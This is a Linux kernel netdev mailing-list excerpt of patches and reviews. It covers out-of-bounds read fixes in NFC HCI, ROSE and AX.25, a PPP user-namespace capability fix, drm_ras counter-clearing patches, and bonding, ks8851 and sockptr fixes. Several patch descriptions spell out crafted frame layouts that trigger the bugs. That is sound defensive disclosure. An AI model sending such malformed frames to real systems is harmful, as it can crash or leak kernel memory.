> Signed-off-by: Ashutosh Desai <ashutoshdesai993@gmail.com>
> ---

Same answer: Testing skb->len alone is not enough.

skbs can have fragments, pskb_may_pull() or skb_linearize() would be needed.

^ permalink raw reply

* Re: [PATCH] nfc: hci: fix OOB heap read on short HCP frames.
From: Eric Dumazet @ 2026-04-09  7:14 UTC (permalink / raw)
  To: Ashutosh Desai; +Cc: netdev, davem, kuba, pabeni, horms, linux-kernel
In-Reply-To: <20260408223113.2009304-1-ashutoshdesai993@gmail.com>

On Wed, Apr 8, 2026 at 3:31 PM Ashutosh Desai
<ashutoshdesai993@gmail.com> wrote:
>
> Both nfc_hci_recv_from_llc() and nfc_hci_msg_rx_work() read byte 1 of
> an sk_buff (the HCP message header field) without first verifying the
> buffer contains at least NFC_HCI_HCP_HEADER_LEN (2) bytes.
>
> The SHDLC LLC layer only filters zero-length frames; a single-byte
> I-frame from a malicious NFC peer therefore reaches the HCI reassembly
> path where packet->message.header is read one byte past the valid data.
> The same issue is present in the NCI HCI implementation (nci/hci.c)
> via nci_hci_data_received_cb() and nci_hci_msg_rx_work().
>
> Add an explicit length check before accessing the message header at
> all four locations, freeing the skb on malformed input.
>
> Signed-off-by: Ashutosh Desai <ashutoshdesai993@gmail.com>
> ---

Same answer: Testing skb->len alone is not enough.

skbs can have fragments, pskb_may_pull() or skb_linearize() would be needed.

^ permalink raw reply

* Re: [PATCH] rose: fix OOB read on short CLEAR REQUEST frames.
From: Eric Dumazet @ 2026-04-09  7:13 UTC (permalink / raw)
  To: Ashutosh Desai
  Cc: netdev, linux-hams, davem, kuba, pabeni, horms, linux-kernel
In-Reply-To: <20260409013246.2051746-1-ashutoshdesai993@gmail.com>

On Wed, Apr 8, 2026 at 6:32 PM Ashutosh Desai
<ashutoshdesai993@gmail.com> wrote:
>
> rose_process_rx_frame() dispatches to state machines after calling
> rose_decode(), but does not verify the frame is long enough before
> doing so. All five state machine handlers read skb->data[3] and
> skb->data[4] (cause and diagnostic bytes) when handling a
> ROSE_CLEAR_REQUEST frame, yet the only upstream length check is
> ROSE_MIN_LEN (3 bytes) in rose_route_frame().
>
> A crafted 3-byte ROSE CLEAR REQUEST frame (bytes: GFI/LCI-high,
> LCI-low, 0x13) passes the minimum length gate and reaches the state
> machines, where skb->data[3] and skb->data[4] are read one and two
> bytes past the valid buffer respectively.
>
> Add a check in rose_process_rx_frame() that drops any CLEAR REQUEST
> frame shorter than 5 bytes (3-byte header + cause + diagnostic),
> covering all five state machines with a single guard.
>
> Signed-off-by: Ashutosh Desai <ashutoshdesai993@gmail.com>
> ---
>  net/rose/rose_in.c | 5 +++++
>  1 file changed, 5 insertions(+)
>
> diff --git a/net/rose/rose_in.c b/net/rose/rose_in.c
> index 0276b393f..1ac9a6aee 100644
> --- a/net/rose/rose_in.c
> +++ b/net/rose/rose_in.c
> @@ -271,6 +271,11 @@ int rose_process_rx_frame(struct sock *sk, struct sk_buff *skb)
>
>         frametype = rose_decode(skb, &ns, &nr, &q, &d, &m);
>
> +       if (frametype == ROSE_CLEAR_REQUEST && skb->len < 5) {
> +               kfree_skb(skb);
> +               return 0;
> +       }
> +

Same answer: Testing skb->len alone is not enough.

skbs can have fragments, pskb_may_pull() or skb_linearize() would be needed.

^ permalink raw reply

* [PATCH net v3] ppp: require CAP_NET_ADMIN in target netns for unattached ioctls
From: Taegu Ha @ 2026-04-09  7:11 UTC (permalink / raw)
  To: Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Qingfang Deng, Kees Cook, Taegu Ha,
	Kuniyuki Iwashima, Sebastian Andrzej Siewior, Cyrill Gorcunov,
	linux-ppp, netdev, linux-kernel
  Cc: qingfang.deng, gnault, jaco, richardbgobert, ericwouds,
	teknoraver

/dev/ppp open is currently authorized against file->f_cred->user_ns,
while unattached administrative ioctls operate on current->nsproxy->net_ns.

As a result, a local unprivileged user can create a new user namespace
with CLONE_NEWUSER, gain CAP_NET_ADMIN only in that new user namespace,
and still issue PPPIOCNEWUNIT, PPPIOCATTACH, or PPPIOCATTCHAN against
an inherited network namespace.

Require CAP_NET_ADMIN in the user namespace that owns the target network
namespace before handling unattached PPP administrative ioctls.

This preserves normal pppd operation in the network namespace it is
actually privileged in, while rejecting the userns-only inherited-netns
case.

Fixes: 273ec51dd7ce ("net: ppp_generic - introduce net-namespace functionality v2")
Signed-off-by: Taegu Ha <hataegu0826@gmail.com>
---
 drivers/net/ppp/ppp_generic.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
index e9b41777be80..c2024684b10d 100644
--- a/drivers/net/ppp/ppp_generic.c
+++ b/drivers/net/ppp/ppp_generic.c
@@ -1057,6 +1057,9 @@ static int ppp_unattached_ioctl(struct net *net, struct ppp_file *pf,
 	struct ppp_net *pn;
 	int __user *p = (int __user *)arg;
 
+	if (!ns_capable(net->user_ns, CAP_NET_ADMIN))
+		return -EPERM;
+
 	switch (cmd) {
 	case PPPIOCNEWUNIT:
 		/* Create a new ppp unit */
-- 
2.43.0


^ permalink raw reply related

* Re: [PATCH] ax25: fix OOB read after address header strip in ax25_rcv().
From: Eric Dumazet @ 2026-04-09  7:08 UTC (permalink / raw)
  To: Ashutosh Desai
  Cc: netdev, linux-hams, jreuter, davem, kuba, pabeni, horms,
	linux-kernel
In-Reply-To: <20260409012235.2049389-1-ashutoshdesai993@gmail.com>

On Wed, Apr 8, 2026 at 6:22 PM Ashutosh Desai
<ashutoshdesai993@gmail.com> wrote:
>
> ax25_rcv() calls skb_pull(skb, ax25_addr_size(&dp)) to strip the
> address header, then immediately reads skb->data[0] and skb->data[1]
> without verifying the buffer still contains at least 2 bytes.
>
> A crafted 15-byte KISS frame (1 KISS byte + 14 address bytes with
> EBIT set in the source address, no control/PID bytes) passes
> ax25_addr_parse() which only requires len >= 14, and passes the KISS
> byte check (low nibble == 0). After skb_pull(1) in ax25_kiss_rcv()
> and skb_pull(14) in ax25_rcv(), skb->len is 0 and the subsequent
> reads of skb->data[0] (control byte) and skb->data[1] (PID byte)
> are out of bounds.
>
> Add a check that at least 2 bytes remain after stripping the address
> header, freeing the skb and returning on malformed input.
>
> Signed-off-by: Ashutosh Desai <ashutoshdesai993@gmail.com>
> ---
>  net/ax25/ax25_in.c | 5 +++++
>  1 file changed, 5 insertions(+)
>
> diff --git a/net/ax25/ax25_in.c b/net/ax25/ax25_in.c
> index d75b3e9ed..92baac77f 100644
> --- a/net/ax25/ax25_in.c
> +++ b/net/ax25/ax25_in.c
> @@ -217,6 +217,11 @@ static int ax25_rcv(struct sk_buff *skb, struct net_device *dev,
>          */
>         skb_pull(skb, ax25_addr_size(&dp));
>
> +       if (skb->len < 2) {
> +               kfree_skb(skb);
> +               return 0;
> +       }
> +

Are you aware of pskb_may_pull() ?

Testing skb->len is not enough.

I suspect all net/ax25 is expecting linear skbs and never considered fragments.

^ permalink raw reply

* [PATCH v2 2/2] drm/xe/xe_drm_ras: Add support for clear-error-counter in XE drm_ras
From: Riana Tauro @ 2026-04-09  7:33 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: aravind.iddamsetty, anshuman.gupta, rodrigo.vivi, joonas.lahtinen,
	simona.vetter, airlied, pratik.bari, joshua.santosh.ranjan,
	ashwin.kumar.kulkarni, shubham.kumar, ravi.kishore.koppuravuri,
	raag.jadav, anvesh.bakwad, maarten.lankhorst, Riana Tauro
In-Reply-To: <20260409073318.2909379-4-riana.tauro@intel.com>

Add support for clear-error-counter command in XE drm_ras
This resets the counter value.

Usage:

$ sudo ynl --family drm_ras  --do clear-error-counter --json \
'{"node-id":1, "error-id":1}'
None

Signed-off-by: Riana Tauro <riana.tauro@intel.com>
Reviewed-by: Raag Jadav <raag.jadav@intel.com>
---
 drivers/gpu/drm/xe/xe_drm_ras.c | 35 +++++++++++++++++++++++++++++++--
 1 file changed, 33 insertions(+), 2 deletions(-)

diff --git a/drivers/gpu/drm/xe/xe_drm_ras.c b/drivers/gpu/drm/xe/xe_drm_ras.c
index e07dc23a155e..c21c8b428de6 100644
--- a/drivers/gpu/drm/xe/xe_drm_ras.c
+++ b/drivers/gpu/drm/xe/xe_drm_ras.c
@@ -27,6 +27,16 @@ static int hw_query_error_counter(struct xe_drm_ras_counter *info,
 	return 0;
 }
 
+static int hw_clear_error_counter(struct xe_drm_ras_counter *info, u32 error_id)
+{
+	if (!info || !info[error_id].name)
+		return -ENOENT;
+
+	atomic_set(&info[error_id].counter, 0);
+
+	return 0;
+}
+
 static int query_uncorrectable_error_counter(struct drm_ras_node *ep, u32 error_id,
 					     const char **name, u32 *val)
 {
@@ -37,6 +47,15 @@ static int query_uncorrectable_error_counter(struct drm_ras_node *ep, u32 error_
 	return hw_query_error_counter(info, error_id, name, val);
 }
 
+static int clear_uncorrectable_error_counter(struct drm_ras_node *node, u32 error_id)
+{
+	struct xe_device *xe = node->priv;
+	struct xe_drm_ras *ras = &xe->ras;
+	struct xe_drm_ras_counter *info = ras->info[DRM_XE_RAS_ERR_SEV_UNCORRECTABLE];
+
+	return hw_clear_error_counter(info, error_id);
+}
+
 static int query_correctable_error_counter(struct drm_ras_node *ep, u32 error_id,
 					   const char **name, u32 *val)
 {
@@ -47,6 +66,15 @@ static int query_correctable_error_counter(struct drm_ras_node *ep, u32 error_id
 	return hw_query_error_counter(info, error_id, name, val);
 }
 
+static int clear_correctable_error_counter(struct drm_ras_node *node, u32 error_id)
+{
+	struct xe_device *xe = node->priv;
+	struct xe_drm_ras *ras = &xe->ras;
+	struct xe_drm_ras_counter *info = ras->info[DRM_XE_RAS_ERR_SEV_CORRECTABLE];
+
+	return hw_clear_error_counter(info, error_id);
+}
+
 static struct xe_drm_ras_counter *allocate_and_copy_counters(struct xe_device *xe)
 {
 	struct xe_drm_ras_counter *counter;
@@ -92,10 +120,13 @@ static int assign_node_params(struct xe_device *xe, struct drm_ras_node *node,
 	if (IS_ERR(ras->info[severity]))
 		return PTR_ERR(ras->info[severity]);
 
-	if (severity == DRM_XE_RAS_ERR_SEV_CORRECTABLE)
+	if (severity == DRM_XE_RAS_ERR_SEV_CORRECTABLE) {
 		node->query_error_counter = query_correctable_error_counter;
-	else
+		node->clear_error_counter = clear_correctable_error_counter;
+	} else {
 		node->query_error_counter = query_uncorrectable_error_counter;
+		node->clear_error_counter = clear_uncorrectable_error_counter;
+	}
 
 	return 0;
 }
-- 
2.47.1


^ permalink raw reply related

* [PATCH v2 1/2] drm/drm_ras: Add clear-error-counter netlink command to drm_ras
From: Riana Tauro @ 2026-04-09  7:33 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: aravind.iddamsetty, anshuman.gupta, rodrigo.vivi, joonas.lahtinen,
	simona.vetter, airlied, pratik.bari, joshua.santosh.ranjan,
	ashwin.kumar.kulkarni, shubham.kumar, ravi.kishore.koppuravuri,
	raag.jadav, anvesh.bakwad, maarten.lankhorst, Riana Tauro,
	Jakub Kicinski, Zack McKevitt, Lijo Lazar, Hawking Zhang,
	David S. Miller, Paolo Abeni, Eric Dumazet
In-Reply-To: <20260409073318.2909379-4-riana.tauro@intel.com>

Introduce a new 'clear-error-counter' drm_ras command to reset the counter
value for a specific error counter of a given node.

The command is a 'do' netlink request with 'node-id' and 'error-id'
as parameters with no response payload.

Usage:

$ sudo ynl --family drm_ras  --do clear-error-counter --json \
'{"node-id":1, "error-id":1}'
None

Cc: Jakub Kicinski <kuba@kernel.org>
Cc: Zack McKevitt <zachary.mckevitt@oss.qualcomm.com>
Cc: Lijo Lazar <lijo.lazar@amd.com>
Cc: Hawking Zhang <Hawking.Zhang@amd.com>
Cc: David S. Miller <davem@davemloft.net>
Cc: Paolo Abeni <pabeni@redhat.com>
Cc: Eric Dumazet <edumazet@google.com>
Signed-off-by: Riana Tauro <riana.tauro@intel.com>
Reviewed-by: Jakub Kicinski <kuba@kernel.org>
Reviewed-by: Raag Jadav <raag.jadav@intel.com>
---
 Documentation/gpu/drm-ras.rst            |  8 +++++
 Documentation/netlink/specs/drm_ras.yaml | 13 ++++++-
 drivers/gpu/drm/drm_ras.c                | 43 +++++++++++++++++++++++-
 drivers/gpu/drm/drm_ras_nl.c             | 13 +++++++
 drivers/gpu/drm/drm_ras_nl.h             |  2 ++
 include/drm/drm_ras.h                    | 11 ++++++
 include/uapi/drm/drm_ras.h               |  1 +
 7 files changed, 89 insertions(+), 2 deletions(-)

diff --git a/Documentation/gpu/drm-ras.rst b/Documentation/gpu/drm-ras.rst
index 70b246a78fc8..4636e68f5678 100644
--- a/Documentation/gpu/drm-ras.rst
+++ b/Documentation/gpu/drm-ras.rst
@@ -52,6 +52,8 @@ User space tools can:
   as a parameter.
 * Query specific error counter values with the ``get-error-counter`` command, using both
   ``node-id`` and ``error-id`` as parameters.
+* Clear specific error counters with the ``clear-error-counter`` command, using both
+  ``node-id`` and ``error-id`` as parameters.
 
 YAML-based Interface
 --------------------
@@ -101,3 +103,9 @@ Example: Query an error counter for a given node
     sudo ynl --family drm_ras --do get-error-counter --json '{"node-id":0, "error-id":1}'
     {'error-id': 1, 'error-name': 'error_name1', 'error-value': 0}
 
+Example: Clear an error counter for a given node
+
+.. code-block:: bash
+
+    sudo ynl --family drm_ras --do clear-error-counter --json '{"node-id":0, "error-id":1}'
+    None
diff --git a/Documentation/netlink/specs/drm_ras.yaml b/Documentation/netlink/specs/drm_ras.yaml
index 79af25dac3c5..e113056f8c01 100644
--- a/Documentation/netlink/specs/drm_ras.yaml
+++ b/Documentation/netlink/specs/drm_ras.yaml
@@ -99,7 +99,7 @@ operations:
       flags: [admin-perm]
       do:
         request:
-          attributes:
+          attributes: &id-attrs
             - node-id
             - error-id
         reply:
@@ -113,3 +113,14 @@ operations:
             - node-id
         reply:
           attributes: *errorinfo
+    -
+      name: clear-error-counter
+      doc: >-
+           Clear error counter for a given node.
+           The request includes the error-id and node-id of the
+           counter to be cleared.
+      attribute-set: error-counter-attrs
+      flags: [admin-perm]
+      do:
+        request:
+          attributes: *id-attrs
diff --git a/drivers/gpu/drm/drm_ras.c b/drivers/gpu/drm/drm_ras.c
index b2fa5ab86d87..d6eab29a1394 100644
--- a/drivers/gpu/drm/drm_ras.c
+++ b/drivers/gpu/drm/drm_ras.c
@@ -26,7 +26,7 @@
  * efficient lookup by ID. Nodes can be registered or unregistered
  * dynamically at runtime.
  *
- * A Generic Netlink family `drm_ras` exposes two main operations to
+ * A Generic Netlink family `drm_ras` exposes the below operations to
  * userspace:
  *
  * 1. LIST_NODES: Dump all currently registered RAS nodes.
@@ -37,6 +37,10 @@
  *    Returns all counters of a node if only Node ID is provided or specific
  *    error counters.
  *
+ * 3. CLEAR_ERROR_COUNTER: Clear error counter of a given node.
+ *    Userspace must provide Node ID, Error ID.
+ *    Clears specific error counter of a node if supported.
+ *
  * Node registration:
  *
  * - drm_ras_node_register(): Registers a new node and assigns
@@ -66,6 +70,8 @@
  *   operation, fetching all counters from a specific node.
  * - drm_ras_nl_get_error_counter_doit(): Implements the GET_ERROR_COUNTER doit
  *   operation, fetching a counter value from a specific node.
+ * - drm_ras_nl_clear_error_counter_doit(): Implements the CLEAR_ERROR_COUNTER doit
+ *   operation, clearing a counter value from a specific node.
  */
 
 static DEFINE_XARRAY_ALLOC(drm_ras_xa);
@@ -314,6 +320,41 @@ int drm_ras_nl_get_error_counter_doit(struct sk_buff *skb,
 	return doit_reply_value(info, node_id, error_id);
 }
 
+/**
+ * drm_ras_nl_clear_error_counter_doit() - Clear an error counter of a node
+ * @skb: Netlink message buffer
+ * @info: Generic Netlink info containing attributes of the request
+ *
+ * Extracts the node ID and error ID from the netlink attributes and
+ * clears the current value.
+ *
+ * Return: 0 on success, or negative errno on failure.
+ */
+int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
+					struct genl_info *info)
+{
+	struct drm_ras_node *node;
+	u32 node_id, error_id;
+
+	if (!info->attrs ||
+	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID) ||
+	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID))
+		return -EINVAL;
+
+	node_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID]);
+	error_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID]);
+
+	node = xa_load(&drm_ras_xa, node_id);
+	if (!node || !node->clear_error_counter)
+		return -ENOENT;
+
+	if (error_id < node->error_counter_range.first ||
+	    error_id > node->error_counter_range.last)
+		return -EINVAL;
+
+	return node->clear_error_counter(node, error_id);
+}
+
 /**
  * drm_ras_node_register() - Register a new RAS node
  * @node: Node structure to register
diff --git a/drivers/gpu/drm/drm_ras_nl.c b/drivers/gpu/drm/drm_ras_nl.c
index 16803d0c4a44..dea1c1b2494e 100644
--- a/drivers/gpu/drm/drm_ras_nl.c
+++ b/drivers/gpu/drm/drm_ras_nl.c
@@ -22,6 +22,12 @@ static const struct nla_policy drm_ras_get_error_counter_dump_nl_policy[DRM_RAS_
 	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
 };
 
+/* DRM_RAS_CMD_CLEAR_ERROR_COUNTER - do */
+static const struct nla_policy drm_ras_clear_error_counter_nl_policy[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID + 1] = {
+	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
+	[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID] = { .type = NLA_U32, },
+};
+
 /* Ops table for drm_ras */
 static const struct genl_split_ops drm_ras_nl_ops[] = {
 	{
@@ -43,6 +49,13 @@ static const struct genl_split_ops drm_ras_nl_ops[] = {
 		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID,
 		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DUMP,
 	},
+	{
+		.cmd		= DRM_RAS_CMD_CLEAR_ERROR_COUNTER,
+		.doit		= drm_ras_nl_clear_error_counter_doit,
+		.policy		= drm_ras_clear_error_counter_nl_policy,
+		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID,
+		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DO,
+	},
 };
 
 struct genl_family drm_ras_nl_family __ro_after_init = {
diff --git a/drivers/gpu/drm/drm_ras_nl.h b/drivers/gpu/drm/drm_ras_nl.h
index 06ccd9342773..a398643572a5 100644
--- a/drivers/gpu/drm/drm_ras_nl.h
+++ b/drivers/gpu/drm/drm_ras_nl.h
@@ -18,6 +18,8 @@ int drm_ras_nl_get_error_counter_doit(struct sk_buff *skb,
 				      struct genl_info *info);
 int drm_ras_nl_get_error_counter_dumpit(struct sk_buff *skb,
 					struct netlink_callback *cb);
+int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
+					struct genl_info *info);
 
 extern struct genl_family drm_ras_nl_family;
 
diff --git a/include/drm/drm_ras.h b/include/drm/drm_ras.h
index 5d50209e51db..f2a787bc4f64 100644
--- a/include/drm/drm_ras.h
+++ b/include/drm/drm_ras.h
@@ -58,6 +58,17 @@ struct drm_ras_node {
 	int (*query_error_counter)(struct drm_ras_node *node, u32 error_id,
 				   const char **name, u32 *val);
 
+	/**
+	 * @clear_error_counter:
+	 *
+	 * This callback is used by drm_ras to clear a specific error counter.
+	 * Driver should implement this callback to support clearing error counters
+	 * of a node.
+	 *
+	 * Returns: 0 on success, negative error code on failure.
+	 */
+	int (*clear_error_counter)(struct drm_ras_node *node, u32 error_id);
+
 	/** @priv: Driver private data */
 	void *priv;
 };
diff --git a/include/uapi/drm/drm_ras.h b/include/uapi/drm/drm_ras.h
index 5f40fa5b869d..218a3ee86805 100644
--- a/include/uapi/drm/drm_ras.h
+++ b/include/uapi/drm/drm_ras.h
@@ -41,6 +41,7 @@ enum {
 enum {
 	DRM_RAS_CMD_LIST_NODES = 1,
 	DRM_RAS_CMD_GET_ERROR_COUNTER,
+	DRM_RAS_CMD_CLEAR_ERROR_COUNTER,
 
 	__DRM_RAS_CMD_MAX,
 	DRM_RAS_CMD_MAX = (__DRM_RAS_CMD_MAX - 1)
-- 
2.47.1


^ permalink raw reply related

* [PATCH v2 0/2] Add clear-error-counter command to drm_ras
From: Riana Tauro @ 2026-04-09  7:33 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: aravind.iddamsetty, anshuman.gupta, rodrigo.vivi, joonas.lahtinen,
	simona.vetter, airlied, pratik.bari, joshua.santosh.ranjan,
	ashwin.kumar.kulkarni, shubham.kumar, ravi.kishore.koppuravuri,
	raag.jadav, anvesh.bakwad, maarten.lankhorst, Riana Tauro

Add clear-error-counter command to drm_ras to clear a specific error
counter of a node. The request parameters for this command are
node-id and error-id and no response payload.
Implement the callback in XE driver to demonstrate usage.

Usage:

$ sudo ynl --family drm_ras  --dump get-error-counter --json '{"node-id":1}'
[{'error-id': 1, 'error-name': 'core-compute', 'error-value': 0},
 {'error-id': 2, 'error-name': 'soc-internal', 'error-value': 3}]

$ sudo ynl --family drm_ras  --do clear-error-counter --json \
'{"node-id":1, "error-id":2}'
None

$ sudo ynl --family drm_ras  --dump get-error-counter --json '{"node-id":1}'
[{'error-id': 1, 'error-name': 'core-compute', 'error-value': 0},
 {'error-id': 2, 'error-name': 'soc-internal', 'error-value': 0}]

Rev2: Split patches

Riana Tauro (2):
  drm/drm_ras: Add clear-error-counter netlink command to drm_ras
  drm/xe/xe_drm_ras: Add support for clear-error-counter in XE drm_ras

 Documentation/gpu/drm-ras.rst            |  8 +++++
 Documentation/netlink/specs/drm_ras.yaml | 13 ++++++-
 drivers/gpu/drm/drm_ras.c                | 43 +++++++++++++++++++++++-
 drivers/gpu/drm/drm_ras_nl.c             | 13 +++++++
 drivers/gpu/drm/drm_ras_nl.h             |  2 ++
 drivers/gpu/drm/xe/xe_drm_ras.c          | 35 +++++++++++++++++--
 include/drm/drm_ras.h                    | 11 ++++++
 include/uapi/drm/drm_ras.h               |  1 +
 8 files changed, 122 insertions(+), 4 deletions(-)

-- 
2.47.1


^ permalink raw reply

* Re: [PATCH net v3 0/5] bonding: 3ad: fix carrier state with no valid slaves
From: Jonas Gorski @ 2026-04-09  6:53 UTC (permalink / raw)
  To: Jakub Kicinski, Louis Scalbert
  Cc: netdev, andrew+netdev, jv, edumazet, pabeni, fbl, andy,
	shemminger, maheshb
In-Reply-To: <20260408201341.68f31247@kernel.org>

On 09/04/2026 05:13, Jakub Kicinski wrote:
> On Wed,  8 Apr 2026 17:23:48 +0200 Louis Scalbert wrote:
>> The current behavior is not compliant with the LACP standard. This
>> patchset introduces a working behavior that is not strictly
>> standard-compliant either, but is widely adopted across the industry.
>> It consists of bringing the bonding master interface down to signal to
>> upper-layer processes that it is not usable.
> 
> Is the only problem the compliance? If so I don't think this qualifies
> as a fix. Please drop the Fixes tags and repost for net-next. Please
> keep in mind the 24h reposting period (also I need some time tomorrow
> to queue your patch to the CI so that the selftest passes when v4 is
> posted :()

Signalling link up too early can cause issues for some protocols that
may change behavior in the absence of PDUs from a link partner.

E.g. AFAIU RSTP may decide the bond is an edge port because no RSTP
BPDUs received and put the bond in forwarding, which then temporarily
creates a loop once the bond actually starts forwarding packets (until
it receives the next RSTP BPDU, which may take up to two seconds).

Best regards,
Jonas

^ permalink raw reply

* Re: [net,PATCH v2] net: ks8851: Reinstate disabling of BHs around IRQ handler
From: Nicolai Buchwitz @ 2026-04-09  6:52 UTC (permalink / raw)
  To: Marek Vasut
  Cc: netdev, stable, David S. Miller, Andrew Lunn, Eric Dumazet,
	Jakub Kicinski, Paolo Abeni, Ronald Wahl, Yicong Hui,
	linux-kernel
In-Reply-To: <20260408162535.98108-1-marex@nabladev.com>

Hi Marek

On 8.4.2026 18:24, Marek Vasut wrote:

> [...]

> +	bool			no_bh_in_irq_handler;

> [...]

> +/**
> + * ks8851_irq_nobh - IRQ handler with BH disabled
> + * @irq: IRQ number
> + * @_ks: cookie
> + *
> + * Wrapper which calls ks8851_irq() with BH disabled.
> + */
> +static irqreturn_t ks8851_irq_nobh(int irq, void *_ks)
> +{
> +	irqreturn_t ret;
> +
> +	local_bh_disable();
> +	ret = ks8851_irq(irq, _ks);
> +	local_bh_enable();
> +
> +	return ret;
> +}
> +
>  /**
>   * ks8851_flush_tx_work - flush outstanding TX work
>   * @ks: The device state
> @@ -408,7 +426,9 @@ static int ks8851_net_open(struct net_device *dev)
>  	unsigned long flags;
>  	int ret;
> 
> -	ret = request_threaded_irq(dev->irq, NULL, ks8851_irq,
> +	ret = request_threaded_irq(dev->irq, NULL,
> +				   ks->no_bh_in_irq_handler ?
> +				   ks8851_irq_nobh : ks8851_irq,

This works, but wouldn't it be simpler to put the BH disable
into the PAR lock/unlock directly?

   static void ks8851_lock_par(...)
   {
       local_bh_disable();
       spin_lock_irqsave(&ksp->lock, *flags);
   }

   static void ks8851_unlock_par(...)
   {
       spin_unlock_irqrestore(&ksp->lock, *flags);
       local_bh_enable();
   }

No flag, no wrapper, no conditional in request_threaded_irq.
And it protects all PAR lock/unlock callsites, not just the
IRQ handler.

> [...]

Regards
Nicolai

Tested-by: Nicolai Buchwitz <nb@tipi-net.de>  # KS8851 SPI, non-RT

^ permalink raw reply

* Re: [PATCH 2/5] sockptr: fix usize check in copy_struct_from_sockptr() for user pointers
From: Aleksa Sarai @ 2026-04-09  6:39 UTC (permalink / raw)
  To: Stefan Metzmacher
  Cc: linux-kernel, Dmitry Safonov, Dmitry Safonov, Francesco Ruggeri,
	Salam Noureddine, David Ahern, David S . Miller, Michal Luczaj,
	David Wei, Luiz Augusto von Dentz, Luiz Augusto von Dentz,
	Marcel Holtmann, Xin Long, Eric Dumazet, Kuniyuki Iwashima,
	Paolo Abeni, Willem de Bruijn, Neal Cardwell, Jakub Kicinski,
	Simon Horman, Christian Brauner, Kees Cook, netdev,
	linux-bluetooth
In-Reply-To: <2026-04-09-carried-furtive-washer-brail-mNQ6oV@cyphar.com>

[-- Attachment #1: Type: text/plain, Size: 3196 bytes --]

On 2026-04-09, Aleksa Sarai <cyphar@cyphar.com> wrote:
> On 2026-04-07, Stefan Metzmacher <metze@samba.org> wrote:
> > copy_struct_from_user will never hit the check_zeroed_user() call
> > and will never return -E2BIG if new userspace passed new bits in a
> > larger structure than the current kernel structure.
> > 
> > As far as I can there are no critical/related uapi changes in
> > 
> > - include/net/bluetooth/bluetooth.h and net/bluetooth/sco.c
> >   after the use of copy_struct_from_sockptr in v6.13-rc3
> > - include/uapi/linux/tcp.h and net/ipv4/tcp_ao.c
> >   after the use of copy_struct_from_sockptr in v6.6-rc1
> > 
> > So that new callers will get the correct behavior from the start.
> > 
> > Fixes: 4954f17ddefc ("net/tcp: Introduce TCP_AO setsockopt()s")
> > Fixes: ef84703a911f ("net/tcp: Add TCP-AO getsockopt()s")
> > Fixes: faadfaba5e01 ("net/tcp: Add TCP_AO_REPAIR")
> > Fixes: 3e643e4efa1e ("Bluetooth: Improve setsockopt() handling of malformed user input")
> > Cc: Dmitry Safonov <0x7f454c46@gmail.com>
> > Cc: Dmitry Safonov <dima@arista.com>
> > Cc: Francesco Ruggeri <fruggeri@arista.com>
> > Cc: Salam Noureddine <noureddine@arista.com>
> > Cc: David Ahern <dsahern@kernel.org>
> > Cc: David S. Miller <davem@davemloft.net>
> > Cc: Michal Luczaj <mhal@rbox.co>
> > Cc: David Wei <dw@davidwei.uk>
> > Cc: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
> > Cc: Luiz Augusto von Dentz <luiz.dentz@gmail.com>
> > Cc: Marcel Holtmann <marcel@holtmann.org>
> > Cc: Xin Long <lucien.xin@gmail.com>
> > Cc: Eric Dumazet <edumazet@google.com>
> > Cc: Kuniyuki Iwashima <kuniyu@google.com>
> > Cc: Paolo Abeni <pabeni@redhat.com>
> > Cc: Willem de Bruijn <willemb@google.com>
> > Cc: Neal Cardwell <ncardwell@google.com>
> > Cc: Jakub Kicinski <kuba@kernel.org>
> > Cc: Simon Horman <horms@kernel.org>
> > Cc: Aleksa Sarai <cyphar@cyphar.com>
> > Cc: Christian Brauner <brauner@kernel.org>
> > CC: Kees Cook <keescook@chromium.org>
> > Cc: netdev@vger.kernel.org
> > Cc: linux-bluetooth@vger.kernel.org
> > Cc: linux-kernel@vger.kernel.org
> > Signed-off-by: Stefan Metzmacher <metze@samba.org>
> > ---
> >  include/linux/sockptr.h | 2 +-
> >  1 file changed, 1 insertion(+), 1 deletion(-)
> > 
> > diff --git a/include/linux/sockptr.h b/include/linux/sockptr.h
> > index 3e6c8e9d67ae..ba88f4d78c1b 100644
> > --- a/include/linux/sockptr.h
> > +++ b/include/linux/sockptr.h
> > @@ -91,7 +91,7 @@ static inline int copy_struct_from_sockptr(void *dst, size_t ksize,
> >  	size_t rest = max(ksize, usize) - size;
> >  
> >  	if (!sockptr_is_kernel(src))
> > -		return copy_struct_from_user(dst, ksize, src.user, size);
> > +		return copy_struct_from_user(dst, ksize, src.user, usize);
> >  
> >  	if (usize < ksize) {
> >  		memset(dst + size, 0, rest);
> 
> It is a little weird that this function open-codes memchr_inv() --
> check_zeroed_sockptr() exists and does the right thing. Maybe it'd be
> nice to fix that too?

Ah my bad, I didn't see that you already fixed this in patch #4.

> In any case,
> 
> Reviewed-by: Aleksa Sarai <aleksa@amutable.com>

-- 
Aleksa Sarai
https://www.cyphar.com/

[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 265 bytes --]

^ permalink raw reply

* Re: [PATCH 2/5] sockptr: fix usize check in copy_struct_from_sockptr() for user pointers
